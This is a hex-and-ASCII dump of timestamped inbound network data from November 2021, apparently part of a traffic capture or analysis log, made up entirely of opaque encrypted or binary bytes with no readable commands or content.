76 1f 53 c8 0c 2e 17 d2 6c 77 dd 1c e6 86 18 a7 9d 1b
                                            Data Ascii: HJ|1Sj0vDNx6w]9Gg89"Yy=xV|",]r|:NLg/{.1OG;t_-#e6ox/<UFC|4wd--o*lh8}U&c/&#(sA;y(-15QStvYeGU"vS.lw
                                            2021-11-24 14:40:42 UTC31INData Raw: 1e eb 24 42 9d 5e d5 a1 6d ec af 5c fc 38 4b 01 9d 05 06 e4 6a f4 f5 3e d6 61 24 35 eb ee 1b 5e 1b ba ec 8c de 2f b1 33 c2 8e a6 37 ca c0 20 0c 5b 5a f0 c7 d4 1a 72 33 bc 03 df 4c 3b d1 fe b8 3c 5e 95 33 2f 01 0e 0e af 62 ed e7 e7 4d fe 9d 3d 6d 8c 57 3e ef 47 5c 56 be cc 97 c0 db 41 2a 91 a1 19 47 ba 7f d8 b0 c3 98 1c 2a fa 37 57 6e 7e 0b 27 7a 3b a1 59 34 8c 69 8e 75 f8 d6 cf 37 73 d5 89 15 56 c6 0b fb 90 e4 a1 1f a6 87 49 7a 03 76 78 0d 28 c7 24 5a c4 63 cb 5f 72 dd f9 37 20 5d a8 c6 67 d2 7f 0a 06 39 90 60 c7 ac 49 f0 ba b4 bd 4f 37 c4 c5 0c 4b c9 5a 1a a8 ab c5 f8 82 b9 4d 63 49 4c 55 71 d2 de 9c 62 03 91 1c d3 9e 1d 18 da 1b 2d 4e f7 58 85 f9 3c 60 98 fc 49 21 45 1a c7 10 ca 52 51 31 40 ad fd 45 b0 9d e0 5f a5 3b 4d 7e 8b 31 fc 52 09 27 50 53 3e 3b
                                            Data Ascii: $B^m\8Kj>a$5^/37 [Zr3L;<^3/bM=mW>G\VA*G*7Wn~'z;Y4iu7sVIzvx($Zc_r7 ]g9`IO7KZMcILUqb-NX<`I!ERQ1@E_;M~1R'PS>;
                                            2021-11-24 14:40:42 UTC32INData Raw: 42 b6 68 2f d7 99 24 75 6d 2a 5e 44 49 fe 34 cd 82 b3 97 b6 a2 5f 5d 45 47 0a 95 d1 cc b9 44 ab e8 55 ac c6 27 f6 c8 5b 35 a4 8a 35 0f 5d bb 6a ac 88 5f df 5d 24 23 07 84 ba 22 ca 02 6c af 43 ec 43 7a 33 3b cc 52 f9 1a a5 8e 01 8c 05 a7 77 5d cd 5c 25 5d cf ab 9d 25 c3 59 4f 41 56 21 11 49 39 4a 22 f8 46 1e 93 79 ac 71 7b e4 64 91 aa e9 8f 95 17 39 5f 41 c4 9f 79 08 85 47 e3 28 8d b1 76 50 bd 7c c3 17 71 fe 13 f8 0f 1d f7 57 57 e5 b5 fd 56 ff 5c ae d8 2c 65 10 b4 bc 0c 9d 5e 85 22 69 6d 96 6e 91 d1 89 9e 50 c4 2a 89 64 d3 08 9c 48 92 da d3 0e 89 ef 33 fc 13 25 d2 db 35 e2 09 f0 8c f1 de 23 04 8c 32 55 4a f3 17 76 0d 2c 46 80 97 2a e2 58 16 ac e5 9e 3d e6 fc e8 12 9f 0e a6 63 85 42 5a 91 6d a7 70 45 30 4f f7 61 71 c4 d2 7f 2c 97 6b fe 5a 1d 7a ca 27 9f b9
                                            Data Ascii: Bh/$um*^DI4_]EGDU'[55]j_]$#"lCCz3;Rw]\%]%YOAV!I9J"Fyq{d9_AyG(vP|qWWV\,e^"imnP*dH3%5#2UJv,F*X=cBZmpE0Oaq,kZz'
                                            2021-11-24 14:40:42 UTC33INData Raw: 2c d2 a5 56 38 92 1c 71 59 8d 15 18 da 39 f6 a2 50 c2 8f b9 ba ae 56 d0 5d 5a 15 44 12 cd fc a7 87 df 12 ab 74 f9 bd fd f5 86 7f 18 b8 58 1a ff 2a b1 87 58 93 3d 39 d0 c7 09 0c 50 4b f0 d8 da bc d4 2b 66 0c 11 7e 31 c6 e1 9c b0 61 e5 73 75 8b 8e 04 b7 79 5e d9 ff 4e 69 3c a6 88 89 77 3f 4c 56 56 11 15 40 12 d5 db 41 2b 20 80 16 54 38 6e d3 a4 9f 83 91 14 d2 a0 56 7d 78 18 44 f4 2c 3d 42 35 92 f1 a5 44 0b ce d8 ab 53 d2 b8 22 c9 d7 01 92 d1 79 b0 19 cb 87 79 7a 03 76 5d 7e a3 c8 24 41 c7 7c bb e9 7e 21 e1 24 2f 6c b2 e1 59 db 81 0d 59 63 83 66 dc d1 78 e3 35 03 61 58 b2 60 1c 1b 80 d1 93 85 7d aa e9 d3 99 ba 41 f8 ea 4a 42 79 74 d9 28 fe 00 90 96 f4 97 93 ae da b8 2c 4e f7 76 c7 f0 b2 dd 59 22 4a bd f1 86 ce 15 c8 54 4b ac f8 7b e4 c4 18 a3 0d 5f 89 3c 5a
                                            Data Ascii: ,V8qY9PV]ZDtX*X=9PK+f~1asuy^Ni<w?LVV@A+ T8nV}xD,=B5DS"yyzv]~$A|~!$/lYYcfx5aX`}AJByt(,NvY"JTK{_<Z
                                            2021-11-24 14:40:42 UTC34INData Raw: ad 99 34 92 ad f8 42 d2 45 8b 03 f8 7d a2 49 d6 f4 64 93 ed b6 90 d0 4a e3 85 fe 63 82 ca 96 25 70 4d 63 a6 df c5 b7 b6 53 74 95 b3 35 ec 9a e2 38 d4 56 87 7a 4c 7d c6 d3 c5 1c 69 5a 8d d1 37 65 d0 f0 68 22 48 4d f3 c7 a3 73 70 03 3b 52 be fc d7 65 b3 6f ef b3 88 0e 42 e7 61 b9 e3 13 a9 9d 9a 8d b0 a5 d4 2c 86 ea a6 71 5a e6 ef 8e c7 46 17 d9 ab f9 b7 aa a4 47 29 55 b6 08 a5 94 71 39 f6 32 56 de 06 e1 23 4e 12 e5 b1 47 3a 0f ae 48 4f 89 16 1c f5 1a be 8d 52 c8 84 e2 7b af 56 d0 2e 29 8a 92 05 1d f8 75 1b f2 03 af 63 e5 b0 65 59 75 df 0f ba e6 97 f0 37 a4 37 4a 22 44 99 ca c0 2b 37 0a 4a fa db fb 1f 60 33 ba 0f 55 6f 32 c6 e7 b4 97 61 95 39 41 3b 1f 04 bd 60 ed 54 f0 56 e0 9d a0 55 02 e0 50 e4 56 56 46 b0 da 74 82 db 41 21 27 a3 1a 45 b9 01 81 a4 d7 89 82
                                            Data Ascii: 4BE}IdJc%pMcSt58VzL}iZ7eh"HMsp;ReoBa,qZFG)Uq92V#NG:HOR{V.)uceYu77J"D+7J`3Uo2a9A;`TVUPVVFtA!'E
                                            2021-11-24 14:40:42 UTC35INData Raw: 24 a1 91 6d 64 c8 e6 0c 34 1b 1e e0 0b 3c 1b b2 c4 68 9b 88 56 e7 ae ca be 48 a7 21 e8 60 ab 1d cc df f8 fa 3f d6 3b a0 32 2a d4 26 0d 48 2e 04 03 70 ec 48 24 22 16 99 98 2b ad 73 4e 23 f7 94 79 a4 29 b6 7a 73 69 58 ef cf 56 f7 ba e8 93 3d 64 46 dd 07 25 35 56 14 21 29 80 5b 01 3c 5b f8 02 c5 ab b6 15 25 c9 ae 11 c3 cd ee b1 53 c0 d6 23 d3 5b 92 48 8e 37 79 c3 32 5e ee 40 51 be f4 cd 76 c0 a9 40 1b 27 43 2d fa b5 16 d8 b1 04 db 89 ff d9 7b 41 de 63 1a ca 9e 35 79 6e bb 76 69 43 f6 20 82 0b c3 b7 84 85 49 53 6d 28 1c 6b da f3 bf 4d a3 87 77 bb 38 2c c9 cd 5d 3f b5 87 3c 17 a7 34 f1 c1 8f 5b e7 29 d0 02 e2 82 b4 66 a4 01 69 ef db 9c 2b 55 31 27 1b 89 d6 59 9e 5e 5c e6 18 af 46 eb 07 7e 31 02 d5 aa a0 2f e9 59 0d 5d 56 30 05 45 59 65 38 95 5e ee 92 55 a1 0f
                                            Data Ascii: $md4<hVH!`?;2*&H.pH$"+sN#y)zsiXV=dF%5V!)[<[%S#[H7y2^@Qv@'C-{Ac5ynviC ISm(kMw8,]?<4[)fi+U1'Y^\F~1/Y]V0EYe8^U
                                            2021-11-24 14:40:42 UTC36INData Raw: 3e da 14 49 90 9c 8e 27 6d 13 b0 aa 80 34 62 a9 bb 15 ad 08 81 6c a1 6f a4 5c c8 f3 48 da ed a5 e7 ec 4b cf 85 d5 e9 c2 a4 9c 36 7c 45 76 a6 c9 d3 3e 1e 36 23 94 9f 29 ec ab ef 37 d1 47 a3 05 13 7c cc f1 83 42 68 50 aa 0a 22 46 54 f7 68 39 5e 58 91 a1 a2 5f 72 01 36 6f 87 f2 d2 60 a5 64 70 03 fd 59 43 cb 73 a0 d7 7c 6f 9d 9a af 8d 0a 0a 30 bf 90 d2 4a 50 dc 76 5c 34 a8 18 bf 97 f9 a6 ac dd ee 28 79 bf c3 a7 95 76 3e f6 a3 ee 4f ae cd 21 6f 3f ec d3 b9 c3 e3 d5 2b 4b 8c 1f 3a 84 33 de 86 51 c6 8c e2 7a af 56 dc 0d 46 12 89 35 12 eb 16 0a f4 12 fb 75 f4 a5 fd e4 18 69 02 b8 97 d2 f6 33 b6 1b e5 95 2b 3a a5 b6 20 1f 5b 5d 60 f9 a4 33 63 39 b0 1b 7f 75 49 c7 e1 96 98 71 94 33 24 b5 37 91 b7 73 ec 6d e6 46 e7 81 cc 07 8c 57 3b 4f 2d 03 4c a1 d8 65 8d da 41 21
                                            Data Ascii: >I'm4blo\HK6|Ev>6#)7G|BhP"FTh9^X_r6o`dpYCs|o0JPv\4(yv>O!o?+K:3QzVF5ui3+: []`3c9uIq3$7smFW;O-LeA!
                                            2021-11-24 14:40:42 UTC38INData Raw: 9c ab f0 45 4f 3e 8b e2 92 b7 bb 20 b0 9e 6d 75 c8 e6 0c 21 34 ac e5 1a 3e 73 c3 c0 e6 28 cf de e4 ae c6 9d 28 bd 30 e7 60 f5 1d cc df f7 fa 24 d6 3b a0 81 8b df 2f 2b 5d 20 40 37 62 eb 6a 78 2b 11 fc 8c 2c a5 16 79 22 f7 9f 68 ad 01 9b 7a 4d 63 6f b5 e4 11 fe 92 5b 93 3f 62 5b d9 4c 49 bb eb 02 10 13 91 44 22 31 4d 6c 0a ee 82 ea 1c 34 d0 20 09 b6 bd e9 b6 71 e8 a5 41 d8 48 9d 54 82 17 40 c7 5d 4c c3 49 4a d4 64 c4 5e 7b c6 62 1c 36 41 29 2a d5 38 c8 b9 1f c1 02 59 ee a5 55 b6 6c 9a cb 94 2e 51 e2 0a 51 7a 44 02 27 93 13 ac 86 ea d2 43 50 4f 92 37 6b d0 e1 ab 5c a6 ea 5c 44 3a 5b a1 c9 42 38 a4 83 2a 1d 93 bf 46 98 a3 5a e7 70 db dc e9 bb 0e 08 c0 06 62 e2 cc 8d 2d 54 31 29 ef 79 de 50 b4 70 7b 8b 4f a9 29 26 da 76 30 6a b6 a5 a1 25 c7 2d 41 41 56 31 0d
                                            Data Ascii: EO> mu!4>s((0`$;/+] @7bjx+,y"hzMco[?b[LID"1Ml4 qAHT@]LIJd^{b6A)*8YUl.QQzD'CPO7k\\D:[B8*FZpb-T1)yPp{O)&v0j%-AAV1
                                            2021-11-24 14:40:42 UTC39INData Raw: 31 45 78 58 43 2f 9c 38 5c 91 38 c7 dd 57 9f 94 90 9e 1e 6d 39 a1 ad 9e 24 9c a8 95 1e d5 45 e3 04 a5 6a a2 43 c5 e0 4f da fa a2 85 92 4a f6 95 d6 ff 83 d9 ac 35 7c 01 64 a1 c9 95 39 01 2d cb 86 b6 07 ad 8a ee 36 d1 56 8e 0a 18 82 c7 f5 f9 4b 40 3a 84 c2 3b 22 da f0 68 22 60 55 9d 5f a3 6c 71 03 35 43 a9 e8 c3 7d 5c 65 4d 0d df 84 43 e7 6b b7 f8 6f 6b 9d 8b 82 81 f5 0b 16 9c fc fb c0 5b e6 e4 b1 cf 4a 10 a9 90 e8 b2 b4 c6 ee 28 79 b2 dd a5 96 f8 98 ce c0 e1 b1 af fe 2d 57 3f d4 a3 42 27 e2 aa 75 44 8e 3d 3d f1 32 d4 b5 c1 c2 89 ca f0 bc 53 da 36 43 0c 6c 04 3b ed 5a d8 eb 1b b8 70 f4 a5 ee f6 e4 77 23 b3 9f 3a f6 33 b8 39 dd 86 2e 30 db c5 38 e1 50 67 ee d7 d1 1a 3c 30 bc 0f 55 79 31 c6 eb f3 7c 61 95 39 34 b0 1a 04 a6 76 f5 4e 08 46 cb 9e b7 5a a4 49 3c
                                            Data Ascii: 1ExXC/8\8Wm9$EjCOJ5|d9-6VK@:;"h"`U_lq5C}\eMCkok[J(y-W?B'uD==2S6Cl;Zpw#:39.08Pg<0Uy1|a94vNFZI<
                                            2021-11-24 14:40:42 UTC40INData Raw: 3f d4 87 90 30 4e 44 fb a8 f1 47 f4 b7 e6 dd 76 9c 94 f4 08 8e 0d 3e a6 08 13 47 d6 ef 10 bb 0d 07 f8 10 2e 91 b2 c8 f9 27 f1 e6 f7 a6 cb b7 8f ba 26 f2 03 e7 0f cd d5 fb 97 d4 60 24 ba 34 e3 08 a2 0a 4e 27 6a 58 72 f3 4d f0 3c 13 78 37 35 a2 a3 4c 30 f6 95 6f d7 be b5 7a 4b 7a 44 a8 df d5 dc ba e8 92 2c 61 40 53 ea 5c 30 d2 a3 fb 3e 5a 57 e7 b5 70 7f 02 c4 a6 f3 1d ab 6f a5 0a 6a bd ea a7 46 dc 8d 52 d3 5b 92 4d 91 36 67 cf d3 f1 fe 45 d5 66 b6 e5 65 cb c6 68 32 b0 49 3e f6 d7 36 da b6 1a c1 9d eb b3 f2 46 b1 42 74 d2 95 24 76 65 d0 4e 6c 6b 60 31 87 19 a6 43 94 a0 6b 67 45 4e 17 78 d7 f4 b1 74 9e e8 5c b0 e6 26 dc e0 4c 38 a5 93 2a 06 a3 ba 10 ae 26 81 e7 32 c1 dc f8 92 aa 39 c4 00 54 e5 d2 f3 6e 54 31 3c c5 7b d5 52 dd 91 55 89 45 b9 75 e3 cf 5c 1e fa
                                            Data Ascii: ?0NDGv>G.'&`$4N'jXrM<x75L0ozKzD,a@S\0>ZWpojFR[M6gEfeh2I>6FBt$veNlk`1CkgENxt\&L8*&29TnT1<{RUEu\
                                            2021-11-24 14:40:42 UTC42INData Raw: 92 e5 04 9d 1b 8d ce 57 df be fe 29 54 7d 4d 60 69 a7 38 5a 8d 6b c7 db 38 4d 80 84 80 1c c9 13 a1 a7 b7 29 9c a8 9d 0d d7 4c 9d e0 9a 7c a2 42 d3 c8 da db fc a8 d3 0c 5b e7 97 5a c0 82 ca 9d 20 54 c9 64 a1 c3 ee 37 d1 75 dd 95 b1 17 f0 8b ee 3c c2 40 a0 19 c2 36 c6 d9 ef 6b 7c 5a 87 c8 2e 4a 51 e3 60 56 2b 46 9c 55 b0 7a 6c 02 38 51 b1 c5 bf 73 a2 62 ed 3b e7 a7 43 f4 6d b9 f1 54 34 9d 9a 8d 8b 25 0d 3c 9c 23 43 4e 5a e6 ff ab c7 24 95 ad 90 f3 a4 a1 da 1a 3b 7c 94 bb b7 92 70 07 66 bd e1 bb be c8 0b 34 39 d4 b4 28 a4 1d ab 53 5b 86 07 3b d9 43 dd 8c 54 ea 1e cb ec a5 47 f3 0f 34 11 92 03 78 73 70 0a fe 03 a1 67 dd 9c 98 ed 1a 70 27 2d ed 86 fc 22 9b 1b b0 96 2b 36 a5 58 20 1f 5b 5a f0 c3 fa 1a 16 30 bc 0f 55 ca 30 c6 eb 8d 99 49 e3 30 2e a5 70 9c b6 73
                                            Data Ascii: W)T}M`i8Zk8M)L|B[Z Td7u<@6k|Z.JQ`V+FUzl8Qsb;CmT4%<#CNZ$;|pf49(S[;CTG4xspgp'-"+6X [Z0U0I0.ps
                                            2021-11-24 14:40:42 UTC43INData Raw: d8 a5 92 29 2e 0e b3 db 36 0e 64 6f e8 9d 86 ac 5f 4c e0 20 6f 56 fc c6 f2 41 67 9f 8c e2 94 90 05 20 b0 8e 02 4f c8 e6 06 27 1c 1e e7 1a 38 24 a6 c0 e6 16 e2 7a e6 a1 c0 b5 96 a7 30 ed 0e dc 2c cb d5 e2 96 5a d7 5b aa ee e5 c8 3c 2b 76 24 68 54 70 ec 53 f2 33 ef f7 ac 3e a5 16 17 22 f7 9f 4d 22 2a b4 7c 22 c9 43 b7 c5 55 ed a9 e2 93 2e 6e 54 23 5c 61 76 4d 10 09 73 80 40 3b 7d 56 7f 02 c5 6c fb 15 25 be ba 1a b0 3e ef b1 59 a5 a7 41 d2 7a 9a 45 87 33 71 c7 5d b5 ef 40 5b 53 6d cd 76 93 c4 62 1a 7e 4b 3e fc 9f 32 d9 b1 57 ca 8c ee 35 6b 47 b1 59 08 c0 94 35 76 69 c2 a1 69 6f e7 37 57 a8 ac 9d 84 ad 57 50 45 44 35 1f d1 e0 b1 74 b7 e8 5c b0 2b 23 c5 dd 5f 32 a4 92 20 19 a9 44 47 82 aa 62 88 21 db dc e7 98 a2 03 c0 11 63 fa c1 0d 4f 78 38 15 9a 55 dc 50 ad
                                            Data Ascii: ).6do_L oVAg O'8$z0,Z[<+v$hTpS3>"M"*|"CU.nT#\avMs@;}Vl%>YAzE3q]@[Smvb~K>2W5kGY5viio7WWPED5t\+#_2 DGb!cOx8UP
                                            2021-11-24 14:40:42 UTC44INData Raw: 52 c8 0a 06 2e d1 6c 71 d4 a9 e6 86 cb ad 43 0e a2 ce 71 df be fe 37 41 0b e3 48 07 ae 32 74 a3 e6 c0 d1 e6 4c 92 ba 95 24 6a 13 a1 ad 9f 38 e9 dd 97 0b c9 45 81 6d be 4c a6 43 4c e1 4f da 9f a2 ff 03 55 ff a7 6d ff 82 c0 b4 b8 7f 5c 63 89 ed c2 39 0b 31 d4 bd 0a 3f e4 8d e5 45 6b 47 8b 1f 18 7b a9 0a ed 43 62 49 88 d4 2e 43 7f bd 69 28 59 56 93 4e ad e9 69 14 21 47 90 dc dc 73 a8 49 64 3c d5 a6 42 e7 7a ac 84 f1 6f 9d 9c 94 9a d5 18 1f bf c9 d3 4a 50 f5 e6 8a f3 57 03 a6 4d ec b6 ab cb 01 2e 7d d0 d7 b4 94 19 a8 f0 bc e7 9c aa d9 21 45 3a d4 a3 43 14 97 aa 59 40 e3 9b 13 f1 38 b1 00 53 c2 83 e2 5a af 56 dc 34 43 6c 01 05 17 e1 62 0c e2 03 ac 1a 7c b5 eb e8 0d ac 1c aa ff 8f ce f4 b2 33 c4 84 2c 21 c3 e8 40 1c 51 4d 95 5b d2 32 65 20 b6 18 7a 4c 38 ee 83
                                            Data Ascii: R.lqCq7AH2tL$j8EmLCLOUm\c91?EkG{CbI.Ci(YVNi!GsId<BzoJPWM.}!E:CY@8SZV4Clb|3,!@QM[2e zL8
                                            2021-11-24 14:40:42 UTC45INData Raw: c8 5e 89 36 4d 7b 82 ad ed 36 f6 d8 a9 23 a3 29 24 b2 e2 30 1f 6d 3f d0 b5 1f af 5f 4a 8f 34 6c 56 fa b8 fa 50 6e 85 85 ca 0e 9c 05 26 df 1e 03 4f cf ce be 27 1c 09 f4 12 29 05 b7 3e e7 3d ef 04 75 ae c0 bf 80 95 1e ed 0f c5 0a 32 d4 91 b9 7f c6 3c 86 cf dc 99 2e 21 44 36 62 45 7c c4 21 fb 2a 17 99 0a 2b ad 7f 0b bb f7 95 6f b5 2e 9c cd 4d 69 44 a4 c7 49 f1 92 67 92 3f 6e 65 9e 4c 47 1d d3 15 21 23 ad 7a 20 30 77 49 71 e7 a9 fb 13 36 d5 ab 17 a1 aa 80 99 5b cc a3 50 df 4a 92 2a a3 3d 71 c1 4c 4b fe 48 34 f7 6e cd 70 db cb 4a 25 24 49 38 93 ec 32 d9 b7 08 d9 81 81 cb 6b 47 bb 6c 35 c8 94 22 6f 7e 0a 50 4d 6b cb 31 87 19 bf 93 ad bd 43 50 4f 90 1d 7a dc f7 6d 4f aa f9 50 ab 2b 18 26 34 b3 c7 b5 92 3d d0 b0 ab 57 bf b2 48 69 94 e4 ba 06 6c 4e 0f ea 00 69 e5
                                            Data Ascii: ^6M{6#)$0m?_J4lVPn&O')>=u2<.!D6bE|!*+o.MiDIg?neLG!#z 0wIq6[PJ*=qLKH4npJ%$I82kGl5"o~PMk1CPOzmOP+&4=WHilNi
                                            2021-11-24 14:40:42 UTC47INData Raw: 9f 73 d3 d4 10 00 8e 95 f9 70 37 c6 c8 0c 24 b2 d4 03 a5 fc 1c ec ae ab a6 9d 11 e8 fe 47 df b4 9b 02 47 78 5f 4e 2f 03 3b 5c 9d 89 ea d9 38 4a 92 9b 4a 21 4f 3b 96 ad 9f 32 8f a1 e4 3c d1 45 87 67 8d 44 a2 43 cf 3e 4f dd d6 a3 ef 12 4a e3 8f d0 ff 71 33 9c 23 66 5c 65 a0 d2 f2 3a 01 60 dd 95 b3 61 e4 8b ff 45 6b 47 8b 1f 18 7a b8 f5 ec 43 6c 72 90 c0 3d 4b 6f a3 6b 28 5f 6f 84 5d a3 75 15 d6 30 43 b2 33 d2 56 8a 53 61 04 ed ab 6a df 6b a8 fd a2 6e 9b e4 ab 9c 0b 0e 12 80 fc d3 4c 72 b5 ed a2 cd 7f 1a ae 90 ff d8 6d cb 10 23 8b b2 f1 9c a5 76 2f fb b1 c9 89 af e1 29 9a 3a d2 98 46 20 1c ab 59 4a 8a 15 0e d3 32 d0 96 52 c2 88 ca ec 9f 56 c6 6b 46 1c 88 05 17 ea 6a 3a f7 12 f7 75 f4 b4 b5 ee 1a 67 7c 00 ec 86 fc 39 b4 4d eb 94 2b 34 e2 d7 23 1f 57 63 a3 d2
                                            Data Ascii: sp7$GGx_N/;\8JJ!O;2<EgDC>OJq3#f\e:`aEkGzClr=Kok(_o]u0C3VSajknLrm#v/):F YJ2RVkFj:ug|9M+4#Wc
                                            2021-11-24 14:40:42 UTC48INData Raw: 2b 65 4e 42 24 20 2a ed 4a a9 a6 1c 58 a3 20 4d 74 fc 29 c4 ae f3 cf 75 5f 3f 3b 2c 8c 7d 36 0e 64 3f da 8c 8e bb 30 c5 e1 be 6b 45 f5 ba f6 50 6f 8e e6 6b 95 9f 03 33 bb 85 04 5e c1 ff 69 ae 1d 0f e1 09 32 1c aa e8 69 2d e7 70 cb e6 d1 be be 32 31 ed 05 e2 23 dd df d9 1a 5b d7 31 87 d8 87 fc 2d 21 48 34 67 45 7c fd 4b 97 02 13 f6 86 3b a1 68 6f 4c d3 97 65 a2 38 b8 6b 47 06 64 b5 cf 5e e6 b6 c0 3f 3c 64 4e b2 77 4f 35 5a 12 30 25 ef 57 30 38 51 a1 0d e0 83 cc 15 25 d2 a9 17 98 94 ef b1 53 12 a5 50 da 4c 4e 56 8f 2e 79 d6 4b 78 84 bf a4 2e 44 60 75 ca c0 11 9e 26 49 34 f4 ee 6e da b1 08 e0 17 ee dc 60 6f 2d 44 1b c0 bc b1 7c 76 de 30 dd 42 fc 3b e8 94 ad 9d 8f 92 2c d8 44 4e 17 04 59 e1 bb 56 b5 ed 74 14 3b 26 dc b9 c8 39 a4 89 22 17 a6 92 dd ae a3 50 cf
                                            Data Ascii: +eNB$ *JX Mt)u_?;,}6d?0kEPok3^i2i-p21#[1-!H4gE|K;hoLe8kGd^?<dNwO5Z0%W08Q%SPLNV.yKx.D`u&I4n`o-D|v0B;,DNYVt;&9"P
                                            2021-11-24 14:40:42 UTC49INData Raw: 6a 50 19 b6 77 ab 76 22 ef b1 f6 47 64 e2 98 0c 06 8e 95 f9 65 0b 40 dc 1d 3d cc f5 6e 77 fa 73 ce 84 cd a1 8c 0f 96 f5 29 fc bc f4 22 2a 5c 5b 48 01 b5 2c 4d 88 89 e5 d9 38 4a fb b6 96 34 6c 02 b5 85 23 3b 9c ae f8 34 d1 45 87 7d a1 6d b6 2c d2 e1 4f d0 ee ba d7 d4 4b e3 85 fb 66 5c c4 8e 2e 82 4a 7b a1 c9 d9 56 56 3c dd 9f 6f 2e e0 a1 ee 36 d0 6f 8b 15 10 7c 3a d9 40 ea 69 54 87 c2 3d 4d 45 f0 b1 29 fa 3b 9e 51 a3 73 7a 10 32 43 21 ef a4 62 a1 6a 61 04 e7 a7 59 d7 61 a8 bf 7d 6e 9d f0 87 9d 1a 15 2a 1a d5 d3 4a 5b f5 e8 b3 cd 41 15 30 81 ff a0 bd 57 01 2f 4d aa 48 a5 94 6f 39 6d ad e7 ab b9 7d 32 42 21 c2 2e 56 3a 00 bd c5 5b 8a 08 04 6d 23 d8 92 44 5e 98 cc f3 a6 40 46 36 40 0d 98 13 8b fa 77 15 ff 04 37 64 f2 ab e7 f8 86 67 09 a5 e1 90 6a 22 b4 2c ca
                                            Data Ascii: jPwv"Gde@=nws)"*\[H,M8J4l#;4E}m,OKf\.J{VV<o.6o|:@iT=ME);Qsz2C!bjaYa}n*J[A0W/MHo9m}2B!.V:[m#D^@F6@w7dgj",
                                            2021-11-24 14:40:42 UTC50INData Raw: b6 41 56 3a 0d 43 6c 4e 23 f0 5a c8 85 57 a1 09 64 b5 67 95 df 8a 96 97 1d 34 29 8b c4 97 64 28 8a 4e c9 07 81 b1 74 4a 6b 45 ef 15 6c 2c 13 f6 68 c8 f7 7b 51 e6 a0 d4 99 fe 76 90 97 2d 63 32 87 be 0c 9b 22 73 20 69 32 48 60 b4 bd be 9e 41 d8 2b 8a 11 d3 00 8e 68 93 f0 f5 0d 87 ee 1b b1 12 23 d8 ea 03 fb 0b ea 84 e8 21 22 28 b8 2b 63 1c ff 19 64 17 d2 46 b7 aa 24 8d f2 15 ac ef ea 0e c7 fa b1 b3 93 0e a4 7e 05 d0 76 93 7f a7 0e de 26 b1 fc 5e 76 ad f0 7e 24 88 bd e8 74 1f 57 c5 05 06 63 d1 6c 71 d4 87 e6 86 c7 8f 01 1b 87 ec 55 db af f0 0c 74 78 59 42 2a a3 3e 57 46 44 c2 db 38 5d 90 b8 01 34 6a 19 b2 a5 8e 30 b4 69 94 1e d5 6d 4b 6d a5 76 8a 88 c4 e0 45 b5 30 a3 ff 18 59 e5 86 fe 63 82 ca 96 1e 6a 5e 65 a7 da c5 28 06 11 da 93 b8 e2 8d 89 ee 36 c7 56 8d
                                            Data Ascii: AV:ClN#ZWdg4)d(NtJkEl,h{Qv-c2"s i2H`A+h#!"(+cdF$~v&^v~$tWclqUtxYB*>WFD8]4j0imKmvE0Ycj^e(6V
                                            2021-11-24 14:40:42 UTC51INData Raw: bb 43 8b 38 1b 4f 56 50 5d ab cd 1f 90 fd 43 2b 35 a1 19 7c 61 6d d3 a2 b8 a9 93 05 fc 31 47 77 1d 0d 2a 6c 26 2c 46 57 5c 7f 12 6e ce 63 26 54 9d 07 86 12 c4 a2 3c e1 86 79 9c 1f a0 a1 9b 41 03 7c 5f 7e 6c c8 24 41 17 aa 20 7b 76 e9 e1 24 25 4e b4 ba c2 d8 81 01 21 1c ba 66 d6 a1 bf e8 bd 9e b0 7a 3c d7 ca 4d 6e c6 45 0a 56 aa e9 8b 93 bc 57 8c 77 4c 55 cc fb 6e 9c 74 09 86 90 ec 9e 1d 19 f2 ab 2d 4e fb 70 df f9 f2 6b 8f 2a 10 0b 45 1a d3 03 ce 4d 58 22 4f ac ff 7a aa 8b 1a 5f 89 36 32 72 93 b0 d3 bd f0 e0 5a 4c 29 28 24 a5 f4 2e f0 65 02 d5 b5 a8 ae 5f 4a ec a7 7e 53 fc ba f5 5e 6c 6a 88 ce 98 96 14 24 8e fe 02 4f c9 f9 0a 34 19 0f f6 1f 22 f3 a2 ec e9 3a e5 15 2f ae c0 bf 81 67 23 e9 02 d4 0f c9 d5 e0 90 41 29 3a 86 eb df 0d 33 32 4b 27 7a 51 67 12 43
                                            Data Ascii: C8OVP]C+5|am1Gw*l&,FW\nc&T<yA|_~l$A {v$%N!fz<MnEVWwLUnt-Npk*EMX"Oz_62rZL)($.e_J~S^lj$O4":/g#A):32K'zQgC
                                            2021-11-24 14:40:42 UTC52INData Raw: e1 db 76 2e 6c cd ab be 24 c3 59 19 41 56 30 1d 45 12 64 39 c0 5d e0 d2 54 a1 0f 3d e4 64 84 aa 18 8e 95 17 38 38 71 c4 97 64 de 5c 68 e1 36 96 de 43 46 43 77 c2 12 60 f9 ce ef 17 e3 f6 a5 41 eb 9f e1 99 f8 54 d2 90 2b 6e 32 a6 bc 0c 97 90 bc 21 69 38 e8 52 91 95 83 b6 99 d1 26 a4 3e bc 3d 84 b6 99 fa d7 63 2a ef 1b bb 1f 2c cb f8 37 e8 08 c8 46 e8 20 22 39 86 3a 72 ca ec 12 00 2b d2 47 a6 b2 f4 8e 16 11 bd ea ae 2a c7 eb c8 1e fc 33 ae 74 71 50 70 bb 60 aa 70 47 37 b7 de 97 70 d3 d8 10 96 8d 95 f5 02 0d 51 c8 17 41 bb d3 6c 7d ef 17 f7 80 e5 7c 9e 1b 81 89 f4 de be fe 50 57 78 59 53 14 a3 29 5a b3 3a c3 db 3e 23 26 91 94 3e 1e 01 a1 ad 84 2b 94 ba 9f 0f db cb 36 7b 7f 54 a4 43 c5 cb 5e dd ed aa d7 f2 4a e3 89 c5 f6 f1 e8 9e 36 7a 4f 6f b0 c3 d3 3c 29 e2
                                            Data Ascii: v.l$YAV0Ed9]T=d88qd\h6CFCw`AT+n2!i8R&>=c*,7F "9:r+G*3tqPp`pG7pQAl}|PWxYS)Z:>#&>+6{TC^J6zOo<)
